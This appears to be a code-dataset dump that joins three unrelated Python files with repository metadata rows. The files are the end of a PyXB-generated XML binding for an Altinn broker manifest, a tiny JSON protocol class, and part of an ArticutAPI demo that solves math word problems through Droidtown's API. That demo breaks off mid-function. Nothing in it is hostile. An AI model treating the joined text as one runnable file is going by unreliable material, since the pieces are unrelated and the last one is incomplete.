    __CheckSum = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'CheckSum'), 'CheckSum', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_2_httpschema_altinn_noservicesServiceEngineBroker201506CheckSum', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10), )

    CheckSum = property(__CheckSum.value, __CheckSum.set, None, 'This property should hold the checksum of the file.')

    _ElementMap.update({
        __FileName.name() : __FileName,
        __CheckSum.name() : __CheckSum
    })
    _AttributeMap.update({
    })
# Complex type [anonymous] with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class for the PropertyList container —
# regenerate from the XSD rather than editing by hand.
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
    """This property can hold a list of custom values agreed upon between sender and receivers. This is optional."""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 67, 5)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}Property uses Python identifier Property
    __Property = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Property'), 'Property', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_3_httpschema_altinn_noservicesServiceEngineBroker201506Property', True, pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7), )

    Property = property(__Property.value, __Property.set, None, None)

    _ElementMap.update({
        __Property.name() : __Property
    })
    _AttributeMap.update({
    })
# Complex type [anonymous] with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class for a single key/value Property —
# regenerate from the XSD rather than editing by hand.
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 73, 8)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}PropertyKey uses Python identifier PropertyKey
    __PropertyKey = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PropertyKey'), 'PropertyKey', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_4_httpschema_altinn_noservicesServiceEngineBroker201506PropertyKey', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 75, 10), )

    PropertyKey = property(__PropertyKey.value, __PropertyKey.set, None, None)

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}PropertyValue uses Python identifier PropertyValue
    __PropertyValue = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PropertyValue'), 'PropertyValue', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_4_httpschema_altinn_noservicesServiceEngineBroker201506PropertyValue', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 76, 10), )

    PropertyValue = property(__PropertyValue.value, __PropertyValue.set, None, None)

    _ElementMap.update({
        __PropertyKey.name() : __PropertyKey,
        __PropertyValue.name() : __PropertyValue
    })
    _AttributeMap.update({
    })
# NOTE: PyXB-generated element registrations — regenerate rather than hand-edit.
BrokerServiceManifest = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'BrokerServiceManifest'), CTD_ANON, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 7, 1))
Namespace.addCategoryObject('elementBinding', BrokerServiceManifest.name().localName(), BrokerServiceManifest)

CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceCode'), pyxb.binding.datatypes.string, scope=CTD_ANON, documentation='This property should hold the service code of the BrokerService being used. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 13, 4)))

CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceEditionCode'), pyxb.binding.datatypes.integer, scope=CTD_ANON, documentation='This property should hold the service edition code of the BrokerService being used. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 18, 4)))

CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SendersReference'), pyxb.binding.datatypes.string, scope=CTD_ANON, documentation='This property should hold a reference value defined by the file creator. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 23, 4)))

CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reportee'), pyxb.binding.datatypes.string, scope=CTD_ANON, documentation='This property will hold the organization number or social security number of the file source. Value is required.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 28, 4)))

CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SentDate'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON, documentation='This property will hold the date and time for when the file was received in Altinn. Property value is added by Altinn.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4)))

CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'FileList'), CTD_ANON_, scope=CTD_ANON, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4)))

CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PropertyList'), CTD_ANON_3, scope=CTD_ANON, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4)))
# NOTE: PyXB-generated content-model automaton for CTD_ANON —
# regenerate from the XSD rather than editing by hand.
def _BuildAutomaton ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton
    del _BuildAutomaton
    import pyxb.utils.fac as fac

    counters = set()
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4))
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4))
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4))
    counters.add(cc_2)
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceCode')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 13, 4))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceEditionCode')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 18, 4))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SendersReference')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 23, 4))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reportee')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 28, 4))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SentDate')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'FileList')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4))
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PropertyList')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4))
    st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_6)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        ]))
    transitions.append(fac.Transition(st_5, [
        ]))
    transitions.append(fac.Transition(st_6, [
        ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_5._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_2, True) ]))
    st_6._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton()
# NOTE: PyXB-generated content-model automaton for CTD_ANON_ (FileList) —
# regenerate from the XSD rather than editing by hand.
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'File'), CTD_ANON_2, scope=CTD_ANON_, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7)))

def _BuildAutomaton_ ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_
    del _BuildAutomaton_
    import pyxb.utils.fac as fac

    counters = set()
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7))
    counters.add(cc_0)
    states = []
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'File')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_0._set_transitionSet(transitions)
    return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_._Automaton = _BuildAutomaton_()
# NOTE: PyXB-generated content-model automaton for CTD_ANON_2 (File) —
# regenerate from the XSD rather than editing by hand.
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'FileName'), pyxb.binding.datatypes.string, scope=CTD_ANON_2, documentation='This property should hold the name of the file.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 50, 10)))

CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'CheckSum'), pyxb.binding.datatypes.string, scope=CTD_ANON_2, documentation='This property should hold the checksum of the file.', location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10)))

def _BuildAutomaton_2 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_2
    del _BuildAutomaton_2
    import pyxb.utils.fac as fac

    counters = set()
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10))
    counters.add(cc_0)
    states = []
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'FileName')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 50, 10))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'CheckSum')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 55, 10))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_1._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_2._Automaton = _BuildAutomaton_2()
# NOTE: PyXB-generated content-model automaton for CTD_ANON_3 (PropertyList) —
# regenerate from the XSD rather than editing by hand.
CTD_ANON_3._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Property'), CTD_ANON_4, scope=CTD_ANON_3, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7)))

def _BuildAutomaton_3 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_3
    del _BuildAutomaton_3
    import pyxb.utils.fac as fac

    counters = set()
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7))
    counters.add(cc_0)
    states = []
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_3._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Property')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 72, 7))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_0._set_transitionSet(transitions)
    return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_3._Automaton = _BuildAutomaton_3()
# NOTE: PyXB-generated content-model automaton for CTD_ANON_4 (Property) —
# regenerate from the XSD rather than editing by hand.
CTD_ANON_4._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PropertyKey'), pyxb.binding.datatypes.string, scope=CTD_ANON_4, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 75, 10)))

CTD_ANON_4._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PropertyValue'), pyxb.binding.datatypes.string, scope=CTD_ANON_4, location=pyxb.utils.utility.Location('xsd/Manifest.xsd', 76, 10)))

def _BuildAutomaton_4 ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_4
    del _BuildAutomaton_4
    import pyxb.utils.fac as fac

    counters = set()
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_4._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PropertyKey')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 75, 10))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_4._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PropertyValue')), pyxb.utils.utility.Location('xsd/Manifest.xsd', 76, 10))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    st_1._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_4._Automaton = _BuildAutomaton_4()
| 54.906561 | 387 | 0.765805 |
ec7ef5cf291555c32e1144675119b7c949c12d49 | 269 | py | Python | pyleanrtm/protocol/json_protocol.py | sunng87/pyleanrtm | 794c6841cd1137553d8e4defbc9191a5065984b6 | [
"BSD-3-Clause"
] | null | null | null | pyleanrtm/protocol/json_protocol.py | sunng87/pyleanrtm | 794c6841cd1137553d8e4defbc9191a5065984b6 | [
"BSD-3-Clause"
] | null | null | null | pyleanrtm/protocol/json_protocol.py | sunng87/pyleanrtm | 794c6841cd1137553d8e4defbc9191a5065984b6 | [
"BSD-3-Clause"
] | null | null | null | import json
from pyleanrtm.protocol import BaseProtocol
class JsonProtocol(BaseProtocol):
name = 'lc-json-1'
def encode(self, cmd):
return json.dumps(cmd)
def decode(self, msg):
return json.loads(str(msg))
json_protocol = JsonProtocol()
| 19.214286 | 43 | 0.687732 |
c5b084394c45cdc7271abd48c296226cdfab4243 | 21,846 | py | Python | intern_practice/ArticutAPI/Demos/PrimarySchoolMath/intentFunction.py | howardsukuan/LokiHub | eaa3cc7299b25192353ed0bfe65c14a4c4b1e082 | [
"MIT"
] | 375 | 2019-05-01T15:15:35.000Z | 2022-03-18T00:54:33.000Z | Demos/PrimarySchoolMath/intentFunction.py | lpluo54/ArticutAPI | 366dd9956d0ee3bd81b422844015101168b4bd34 | [
"MIT"
] | 1 | 2019-07-05T06:50:09.000Z | 2020-08-16T10:02:15.000Z | Demos/PrimarySchoolMath/intentFunction.py | lpluo54/ArticutAPI | 366dd9956d0ee3bd81b422844015101168b4bd34 | [
"MIT"
] | 30 | 2019-09-01T11:17:37.000Z | 2021-12-28T23:05:06.000Z | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
import json
import os
import re
import requests
try:
    # Load Droidtown credentials from an "account.info" JSON file that sits
    # next to this script.
    infoPath = "{}/account.info".format(os.path.dirname(os.path.abspath(__file__)))
    infoDICT = json.load(open(infoPath, "r"))
    USERNAME = infoDICT["username"]
    API_KEY = infoDICT["api_key"]
    LOKI_KEY = infoDICT["loki_key"]
except:
    # HINT: fill in your https://api.droidtown.co account name, the Articut
    # API_Key and the Loki project's Loki_Key here.
    USERNAME = ""
    API_KEY = ""
    LOKI_KEY = ""

# Matches a leading run of digits or Chinese numerals (incl. 點/'.').
# NOTE(review): the name is a typo for "numberPat" — kept because other
# modules may import it; the pattern string would also be cleaner as r"...".
nubmerPat = re.compile("[\d0123456789〇一二三四五六七八九十零壹貳參肆伍陸柒捌玖拾廿卅貮兩百佰千仟万萬亿億兆點.]+")
def amountSTRconvert(amountSTR):
    """Convert the leading numeric string of *amountSTR* into a number.

    Sends the string to the Articut lv3 endpoint so that e.g. "兩個"
    yields the numeral 2 for later arithmetic.

    Returns (numberSTR, numeric_value).
    """
    numberSTR = nubmerPat.match(amountSTR).group()
    payload = {
        "username": USERNAME,
        "api_key": API_KEY,
        "input_str": numberSTR,
        "version": "latest",
        "level": "lv3",
    }
    response = requests.post("https://api.droidtown.co/Articut/API/", json=payload).json()
    return numberSTR, response["number"][numberSTR]
def comparative(subject1, entity1, subject2, entity2, unit, questionDICT):
    """Answer "X 比 Y 多/少幾個" (how many more/fewer) comparison questions.

    Totals each side with inTotal() and stores the absolute difference in
    questionDICT["Answer"].  Returns (amount, questionDICT).
    """
    questionDICT["Question"].append([unit, entity1, subject1, entity2, subject2])
    # inTotal() pushes its own entry onto the "Question" stack, so pop after
    # each call to keep only this comparative question on the stack.
    # (Fixed: dropped the dead `entityAmount = 0` initializer and the unused
    # subject/entity names unpacked from inTotal's return value.)
    _, _, ent1Amount, questionDICT = inTotal(subject1, entity1, unit, questionDICT)
    questionDICT["Question"].pop()
    _, _, ent2Amount, questionDICT = inTotal(subject2, entity2, unit, questionDICT)
    questionDICT["Question"].pop()
    entityAmount = abs(ent1Amount - ent2Amount)
    questionDICT["Answer"] = {"": [unit, entityAmount]}
    return entityAmount, questionDICT
def difference(subject, entity, unit, questionDICT):
    """Handle subtraction questions.

    Resolves which entity/subject the question refers to, sums the matching
    records for *unit* across the Definition / Memory / Calculation stores,
    and writes the absolute total into questionDICT["Answer"].

    Returns (subject, entity, amount, questionDICT); amount is always >= 0.
    NOTE: the accumulation logic mirrors inTotal() almost line for line.
    """
    if entity == "":
        # No entity mentioned: if exactly one entity is known for this unit, use it.
        if unit in questionDICT["Entity"]:
            if len(questionDICT["Entity"][unit]) == 1:
                entity = questionDICT["Entity"][unit][0]
    else:
        # The parsed "entity" may actually be a subject stored under some
        # known entity (e.g. a person's name); swap the roles in that case.
        entityLIST = list(set(list(questionDICT["Definition"].keys())+list(questionDICT["Calculation"].keys())+list(questionDICT["Memory"].keys())))
        if entity not in entityLIST:
            for ent in questionDICT["Definition"].keys():
                if entity in questionDICT["Definition"][ent]:
                    subject = entity
                    entity = ent
                    break
            for ent in questionDICT["Memory"].keys():
                if entity in questionDICT["Memory"][ent]:
                    subject = entity
                    entity = ent
                    break
    if subject == "":
        # No subject mentioned: default to the first subject recorded for the entity.
        if questionDICT["Definition"]:
            if entity in questionDICT["Definition"]:
                subject = list(questionDICT["Definition"][entity].keys())[0]
        elif questionDICT["Calculation"]:
            if entity in questionDICT["Calculation"]:
                subject = list(questionDICT["Calculation"][entity].keys())[0]
    questionDICT["Question"].append([unit, entity, subject])
    entityAmount = 0
    if len(questionDICT["Memory"]) == 0:
        # No Memory records: only Definition and Calculation contribute.
        if entity not in questionDICT["Definition"] and entity not in questionDICT["Calculation"]:
            # Unknown entity: total every record of this unit everywhere.
            for ent in questionDICT["Definition"]:
                for subj in questionDICT["Definition"][ent].values():
                    if unit in subj:
                        entityAmount += subj[unit]
            for ent in questionDICT["Calculation"]:
                for subj in questionDICT["Calculation"][ent].values():
                    for v in subj:
                        if unit in v:
                            entityAmount += v[unit]
        else:
            if entity in questionDICT["Definition"]:
                if subject in questionDICT["Definition"][entity]:
                    entityAmount = questionDICT["Definition"][entity][subject][unit]
                else:
                    for subj in questionDICT["Definition"][entity].values():
                        entityAmount += subj[unit]
            if entity in questionDICT["Calculation"]:
                if subject in questionDICT["Calculation"][entity] and subject != "":
                    for subj in questionDICT["Calculation"][entity][subject]:
                        entityAmount += subj[unit]
                else:
                    for subj in questionDICT["Calculation"][entity].values():
                        for v in subj:
                            if unit in v:
                                entityAmount += v[unit]
    else:
        # Memory records exist: skip Calculation entries carrying a "ref"
        # marker — those came from bitransitive() and already live in Memory.
        if entity not in questionDICT["Definition"] and entity not in questionDICT["Memory"] and entity not in questionDICT["Calculation"]:
            for ent in questionDICT["Definition"]:
                for subj in questionDICT["Definition"][ent].values():
                    if unit in subj:
                        entityAmount += subj[unit]
            for ent in questionDICT["Memory"]:
                for subj in questionDICT["Memory"][ent].values():
                    for v in subj:
                        if unit == v:
                            entityAmount += subj[unit]
            for ent in questionDICT["Calculation"]:
                for subj in questionDICT["Calculation"][ent].values():
                    for v in subj:
                        if unit in v and "ref" not in v:
                            entityAmount += v[unit]
        else:
            if entity in questionDICT["Definition"]:
                if subject in questionDICT["Definition"][entity]:
                    entityAmount = questionDICT["Definition"][entity][subject][unit]
                else:
                    for subj in questionDICT["Definition"][entity].values():
                        entityAmount += subj[unit]
            if entity in questionDICT["Memory"]:
                if subject in questionDICT["Memory"][entity]:
                    entityAmount = questionDICT["Memory"][entity][subject][unit]
                else:
                    for subj in questionDICT["Memory"][entity].values():
                        for v in subj:
                            if unit == v:
                                entityAmount += subj[unit]
            if entity in questionDICT["Calculation"]:
                if subject in questionDICT["Calculation"][entity]:
                    for subj in questionDICT["Calculation"][entity][subject]:
                        if "ref" not in subj:
                            entityAmount += subj[unit]
                else:
                    for subj in questionDICT["Calculation"][entity].values():
                        for v in subj:
                            if unit in v and "ref" not in v:
                                entityAmount += v[unit]
    # Record the answer under the entity when known, else under the subject.
    if entity == "":
        questionDICT["Answer"] = {subject: {unit: abs(entityAmount)}}
    else:
        questionDICT["Answer"] = {entity: {unit: abs(entityAmount)}}
    return subject, entity, abs(entityAmount), questionDICT
def inTotal(subject, entity, unit, questionDICT):
    """Handle addition ("in total") questions.

    Resolves which entity/subject the question refers to, sums the matching
    records for *unit* across the Definition / Memory / Calculation stores,
    and writes the absolute total into questionDICT["Answer"].

    Returns (subject, entity, amount, questionDICT); amount is always >= 0.
    NOTE: near-duplicate of difference(); the only divergence is the extra
    ``"" in ...`` guard when defaulting an empty subject below.
    """
    if entity == "":
        # No entity mentioned: if exactly one entity is known for this unit, use it.
        if unit in questionDICT["Entity"]:
            if len(questionDICT["Entity"][unit]) == 1:
                entity = questionDICT["Entity"][unit][0]
    else:
        # The parsed "entity" may actually be a subject stored under some
        # known entity; swap the roles in that case.
        entityLIST = list(set(list(questionDICT["Definition"].keys())+list(questionDICT["Calculation"].keys())+list(questionDICT["Memory"].keys())))
        if entity not in entityLIST:
            for ent in questionDICT["Definition"].keys():
                if entity in questionDICT["Definition"][ent]:
                    subject = entity
                    entity = ent
                    break
            for ent in questionDICT["Memory"].keys():
                if entity in questionDICT["Memory"][ent]:
                    subject = entity
                    entity = ent
                    break
    if subject == "":
        # Default the subject only when an anonymous ("") entity also exists.
        if questionDICT["Definition"]:
            if entity in questionDICT["Definition"] and "" in questionDICT["Definition"]:
                subject = list(questionDICT["Definition"][entity].keys())[0]
        elif questionDICT["Calculation"]:
            if entity in questionDICT["Calculation"] and "" in questionDICT["Calculation"]:
                subject = list(questionDICT["Calculation"][entity].keys())[0]
    questionDICT["Question"].append([unit, entity, subject])
    entityAmount = 0
    if len(questionDICT["Memory"]) == 0:
        # No Memory records: only Definition and Calculation contribute.
        if entity not in questionDICT["Definition"] and entity not in questionDICT["Calculation"]:
            # Unknown entity: total every record of this unit everywhere.
            for ent in questionDICT["Definition"]:
                for subj in questionDICT["Definition"][ent].values():
                    if unit in subj:
                        entityAmount += subj[unit]
            for ent in questionDICT["Calculation"]:
                for subj in questionDICT["Calculation"][ent].values():
                    for v in subj:
                        if unit in v:
                            entityAmount += v[unit]
        else:
            if entity in questionDICT["Definition"]:
                if subject in questionDICT["Definition"][entity]:
                    entityAmount = questionDICT["Definition"][entity][subject][unit]
                else:
                    for subj in questionDICT["Definition"][entity].values():
                        entityAmount += subj[unit]
            if entity in questionDICT["Calculation"]:
                if subject in questionDICT["Calculation"][entity] and subject != "":
                    for subj in questionDICT["Calculation"][entity][subject]:
                        entityAmount += subj[unit]
                else:
                    for subj in questionDICT["Calculation"][entity].values():
                        for v in subj:
                            if unit in v:
                                entityAmount += v[unit]
    else:
        # Memory records exist: skip Calculation entries carrying a "ref"
        # marker — those came from bitransitive() and already live in Memory.
        if entity not in questionDICT["Definition"] and entity not in questionDICT["Memory"] and entity not in questionDICT["Calculation"]:
            for ent in questionDICT["Definition"]:
                for subj in questionDICT["Definition"][ent].values():
                    if unit in subj:
                        entityAmount += subj[unit]
            for ent in questionDICT["Memory"]:
                for subj in questionDICT["Memory"][ent].values():
                    for v in subj:
                        if unit == v:
                            entityAmount += subj[unit]
            for ent in questionDICT["Calculation"]:
                for subj in questionDICT["Calculation"][ent].values():
                    for v in subj:
                        if unit in v and "ref" not in v:
                            entityAmount += v[unit]
        else:
            if entity in questionDICT["Definition"]:
                if subject in questionDICT["Definition"][entity]:
                    entityAmount = questionDICT["Definition"][entity][subject][unit]
                else:
                    for subj in questionDICT["Definition"][entity].values():
                        entityAmount += subj[unit]
            if entity in questionDICT["Memory"]:
                if subject in questionDICT["Memory"][entity]:
                    entityAmount = questionDICT["Memory"][entity][subject][unit]
                else:
                    for subj in questionDICT["Memory"][entity].values():
                        for v in subj:
                            if unit == v:
                                entityAmount += subj[unit]
            if entity in questionDICT["Calculation"]:
                if subject in questionDICT["Calculation"][entity]:
                    for subj in questionDICT["Calculation"][entity][subject]:
                        if "ref" not in subj:
                            entityAmount += subj[unit]
                else:
                    for subj in questionDICT["Calculation"][entity].values():
                        for v in subj:
                            if unit in v and "ref" not in v:
                                entityAmount += v[unit]
    # Record the answer under the entity when known, else under the subject.
    if entity == "":
        questionDICT["Answer"] = {subject: {unit: abs(entityAmount)}}
    else:
        questionDICT["Answer"] = {entity: {unit: abs(entityAmount)}}
    return subject, entity, abs(entityAmount), questionDICT
def existential(subject, entity, amount, unit, questionDICT):
    """Record an existential/possessive statement ("there are N ... at X",
    "X has N ...").

    *entity* is the location/owner the items exist at; *subject* is the
    holder within it.  Defaults an empty entity to the first one already
    defined, registers the unit->entity mapping, and stores the amount in
    questionDICT["Definition"][entity][subject][unit].

    Returns the mutated questionDICT.
    """
    if entity == "":
        known = list(questionDICT["Definition"])
        if known:
            entity = known[0]
    # Register which entities hold this unit (no duplicates).
    holders = questionDICT["Entity"].setdefault(unit, [])
    if entity not in holders:
        holders.append(entity)
    # Store the amount, creating the nested dicts on demand.
    by_subject = questionDICT["Definition"].setdefault(entity, {})
    by_subject.setdefault(subject, {})[unit] = amount
    return questionDICT
def bitransitive(subject1, subject2, entity1, entity2, amount, unit, questionDICT):
    """Handle "A 比 B 多/少 N" (A has N more/fewer than B) statements.

    subject1/entity1 is the side being described; subject2/entity2 is the
    reference side.  The relation is stored in questionDICT["Calculation"]
    with a "ref" marker, and the resolved absolute amount (reference amount
    + delta) is cached in questionDICT["Memory"].

    Returns (described-object, reference-object, questionDICT).
    """
